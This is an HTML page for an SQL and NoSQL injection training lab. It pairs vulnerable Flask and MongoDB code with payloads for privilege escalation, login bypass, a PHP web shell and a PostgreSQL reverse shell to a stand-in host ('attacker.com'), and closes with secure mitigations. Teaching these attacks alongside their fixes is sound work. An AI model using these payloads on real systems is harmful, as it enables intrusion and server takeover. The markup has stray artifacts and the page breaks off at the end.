| | <!DOCTYPE html> |
| | <html lang="en"> |
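<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>SQL/NoSQL Injection Exploitation Lab</title>
  <!--
    Third-party assets are loaded with no version pin and no Subresource Integrity.
    cdn.tailwindcss.com is Tailwind's Play CDN: it generates the styles in the browser
    at run time and is not versioned, so it cannot carry an integrity hash. That is
    tolerable for a local lab but not for a page served to others. The Font Awesome
    stylesheet is versioned, so it can be pinned with the SRI hash cdnjs publishes:
      <link rel="stylesheet" href="(same URL)" integrity="sha384-PLACEHOLDER_HASH_FROM_CDNJS" crossorigin="anonymous">
    Before hosting this page outside the lab, replace the Play CDN with a locally built
    stylesheet so a Content Security Policy without remote script sources can be applied.
  -->
  <script src="https://cdn.tailwindcss.com"></script>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
  <style>
    /* Fake shell window shown at the top of the page. */
    .terminal {
      font-family: 'Courier New', monospace;
      background-color: #1e1e1e;
      color: #f8f8f2;
      border-radius: 0.5rem;
      padding: 1.5rem;
      overflow-x: auto;
      position: relative;
    }
    /* Title bar of the fake terminal, holding the three coloured dots. */
    .terminal-header {
      background-color: #2d2d2d;
      padding: 0.5rem 1rem;
      border-top-left-radius: 0.5rem;
      border-top-right-radius: 0.5rem;
      display: flex;
      align-items: center;
    }
    .terminal-dot {
      width: 12px;
      height: 12px;
      border-radius: 50%;
      margin-right: 6px;
    }
    .terminal-red { background-color: #ff5f56; }
    .terminal-yellow { background-color: #ffbd2e; }
    .terminal-green { background-color: #27c93f; }
    /* Blinking block cursor placed after the prompt. */
    .terminal-cursor {
      display: inline-block;
      width: 8px;
      height: 16px;
      background-color: #f8f8f2;
      animation: blink 1s infinite;
    }
    @keyframes blink {
      0%, 100% { opacity: 1; }
      50% { opacity: 0; }
    }
    /* Dark panel for code samples. Whitespace inside a plain div is collapsed,
       so use <pre class="code-block"> for samples whose indentation matters. */
    .code-block {
      font-family: 'Courier New', monospace;
      background-color: #2d2d2d;
      color: #f8f8f2;
      border-radius: 0.5rem;
      padding: 1rem;
      overflow-x: auto;
      position: relative;
    }
    /* Tab panels stay hidden until .active is set (no tab markup is visible in
       this part of the file; presumably toggled by script). */
    .tab-content {
      display: none;
    }
    .tab-content.active {
      display: block;
      animation: fadeIn 0.3s ease-in-out;
    }
    @keyframes fadeIn {
      from { opacity: 0; }
      to { opacity: 1; }
    }
    /* Cards lift slightly on hover. */
    .attack-card {
      transition: all 0.3s ease;
    }
    .attack-card:hover {
      transform: translateY(-5px);
      box-shadow: 0 10px 25px rgba(0, 0, 0, 0.1);
    }
    /* Reuses the cursor's keyframes for any element that should blink. */
    .blink {
      animation: blink 1s infinite;
    }
  </style>
</head>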
| | <body class="bg-gray-900 text-gray-100 min-h-screen"> |
| | <div class="container mx-auto px-4 py-8"> |
| | |
<div class="terminal mb-8">
<div class="terminal-header">
<div class="terminal-dot terminal-red"></div>
<div class="terminal-dot terminal-yellow"></div>
<div class="terminal-dot terminal-green"></div>
<div class="ml-2 text-sm">pentester@secure-lab:~/sql_injection/_</div>
</div>
<div class="mt-2">
<!-- NOTE(review): .typing-text and #terminal-output are empty here and are presumably filled by a script that is not visible in this part of the file. Whatever that script writes should go in through textContent (or createTextNode), not innerHTML, so the payload strings shown on this page stay inert text. -->
<div class="text-green-400">$ <span class="typing-text"></span><span class="terminal-cursor"></span></div>
<div id="terminal-output" class="mt-4"></div>
</div>
</div>
| |
|
| | |
| | <div class="grid grid-cols-1 lg:grid-cols-2 gap-8 mb-12"> |
| | |
<div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden attack-card">
<div class="p-6">
<div class="flex items-center mb-4">
<div class="bg-red-900 p-3 rounded-full mr-4">
<i class="fas fa-user-shield text-red-400 text-xl"></i>
</div>
<h2 class="text-2xl font-bold text-white">Privilege Escalation</h2>
</div>

<div class="mb-6">
<h3 class="text-lg font-semibold text-gray-300 mb-3">SQL Injection</h3>
<!-- NOTE(review): the raw "<int:user_id>" in the route below is parsed as an HTML start tag and does not render; write it as &lt;int:user_id&gt;. Note also that Flask's int converter matches digits only, so a typed route is a first line of input validation; the defect being demonstrated is the f-string that splices user_id into the SQL, and the fix is the bound parameter shown in the mitigation section. -->
<div class="code-block mb-2">
<span class="text-gray-400"># Vulnerable Flask endpoint</span><br>
@app.route('/user/<int:user_id>')<br>
def get_user(user_id):<br>
query = f"SELECT * FROM users WHERE id = {user_id}"<br>
result = db.execute(query)<br>
return jsonify(result.fetchall())<br><br>
<span class="text-gray-400"># Attack payload:</span><br>
/user/1; GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%' IDENTIFIED BY 'pwned123'--
</div>
</div>

<div class="mb-6">
<h3 class="text-lg font-semibold text-gray-300 mb-3">NoSQL Injection</h3>
<!-- NOTE(review): this works only because the JSON body is parsed into objects and the handler forwards them to the driver unchecked, where an object is read as a query operator. The defence is a type check on every credential field (see the mitigation card); string escaping does not address operator injection. -->
<div class="code-block mb-2">
<span class="text-gray-400">// Vulnerable MongoDB query</span><br>
db.users.find({<br>
username: req.body.username,<br>
password: req.body.password<br>
});<br><br>
<span class="text-gray-400">// Attack payload (JSON):</span><br>
{<br>
"username": {"$ne": null},<br>
"password": {"$ne": null}<br>
}
</div>
</div>
</div>
</div>
| |
|
| | |
<div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden attack-card">
<div class="p-6">
<div class="flex items-center mb-4">
<div class="bg-blue-900 p-3 rounded-full mr-4">
<i class="fas fa-terminal text-blue-400 text-xl"></i>
</div>
<h2 class="text-2xl font-bold text-white">Command Execution</h2>
</div>

<div class="mb-6">
<h3 class="text-lg font-semibold text-gray-300 mb-3">MySQL Command Execution</h3>
<!-- NOTE(review): sys_exec is not part of stock MySQL; it is a user-defined function that has to be installed on the server beforehand, and INTO OUTFILE needs the FILE privilege plus a target path permitted by secure_file_priv. Hardening: the application's database account should not hold FILE (or SUPER), and secure_file_priv should point at a restricted directory or be NULL to disable file import/export entirely. -->
<div class="code-block mb-2">
<span class="text-gray-400">-- Enable command execution</span><br>
SELECT * FROM users WHERE id = 1;<br>
SELECT sys_exec('whoami'); --<br><br>
<span class="text-gray-400">-- Writing web shell</span><br>
SELECT '<?php system($_GET["cmd"]); ?>'<br>
INTO OUTFILE '/var/www/html/shell.php'; --
</div>
</div>

<div class="mb-6">
<h3 class="text-lg font-semibold text-gray-300 mb-3">PostgreSQL Exploitation</h3>
<!-- NOTE(review): COPY ... TO PROGRAM runs only for a superuser or a member of pg_execute_server_program, so the application role must be neither. The code defect is the f-string; pass the pattern as a bound parameter instead, e.g. cursor.execute("SELECT * FROM products WHERE name LIKE %s", ('%' + query + '%',)) with a psycopg connection. -->
<div class="code-block mb-2">
<span class="text-gray-400"># Vulnerable Flask code</span><br>
@app.route('/search')<br>
def search():<br>
query = request.args.get('q')<br>
sql = f"SELECT * FROM products WHERE name LIKE '%{query}%'"<br>
return execute_query(sql)<br><br>
<span class="text-gray-400"># Attack payload:</span><br>
/search?q='; COPY (SELECT '') TO PROGRAM 'nc -e /bin/bash attacker.com 4444'; --
</div>
</div>
</div>
</div>
| | </div> |
| |
|
| | |
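<div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden mb-12">
  <div class="p-6">
    <h2 class="text-2xl font-bold text-white mb-6">Secure Mitigation Strategies</h2>

    <div class="grid grid-cols-1 md:grid-cols-2 gap-6">
      <!-- Parameterised access through the ORM: user_id is bound, never spliced into SQL.
           The samples use <pre> so the Python indentation survives (a div with br
           collapses it), and the route converter is written as &lt;int:user_id&gt; because
           a raw "<int:user_id>" is parsed as an HTML start tag and vanishes from the page. -->
      <div class="bg-gray-700 p-4 rounded-lg border border-gray-600">
        <div class="flex items-center mb-3">
          <i class="fas fa-shield-alt text-green-400 mr-3" aria-hidden="true"></i>
          <h3 class="text-lg font-semibold text-white">SQLAlchemy ORM</h3>
        </div>
        <pre class="code-block text-sm"><code><span class="text-gray-400"># SECURE: Using SQLAlchemy ORM</span>
<span class="text-gray-400"># The int converter rejects non-numeric ids before the handler runs,</span>
<span class="text-gray-400"># and filter_by() binds user_id as a query parameter.</span>
@app.route('/user/&lt;int:user_id&gt;')
def get_user_secure(user_id):
    user = User.query.filter_by(id=user_id).first()
    if user:
        return jsonify({
            'id': user.id,
            'username': user.username
        })
    return jsonify({'error': 'User not found'}), 404</code></pre>
      </div>

      <!-- Operator injection ({"$ne": null}) succeeds because the handler accepts a JSON
           object where a string was expected. The defence is a type check on every
           credential field. The earlier re.escape(username) call has been removed: it only
           quotes regex metacharacters, does nothing against query operators, and would
           corrupt legitimate usernames containing characters such as "." or "+". -->
      <div class="bg-gray-700 p-4 rounded-lg border border-gray-600">
        <div class="flex items-center mb-3">
          <i class="fas fa-lock text-green-400 mr-3" aria-hidden="true"></i>
          <h3 class="text-lg font-semibold text-white">NoSQL Injection Prevention</h3>
        </div>
        <pre class="code-block text-sm"><code><span class="text-gray-400"># SECURE: NoSQL injection prevention</span>
def authenticate_user_secure(username, password):
    <span class="text-gray-400"># Reject anything that is not a plain string. A JSON object such as</span>
    <span class="text-gray-400"># {"$ne": null} would otherwise reach the driver as a query operator.</span>
    if not isinstance(username, str) or not isinstance(password, str):
        return None
    <span class="text-gray-400"># Look the user up by name only and check the password in application</span>
    <span class="text-gray-400"># code; the secret never becomes part of the query document.</span>
    user = db.users.find_one({'username': username})
    if user is None:
        return None
    <span class="text-gray-400"># Constant-time comparison of the stored hash. A salted password hash</span>
    <span class="text-gray-400"># with its own verifier (e.g. werkzeug's check_password_hash) is the</span>
    <span class="text-gray-400"># better choice than a plain hash_password() equality.</span>
    if not hmac.compare_digest(hash_password(password), user['password']):
        return None
    return user</code></pre>
      </div>
    </div>
  </div>
</div>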
| |
|
| | |
| | <div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden"> |
| | < |
| | </html> |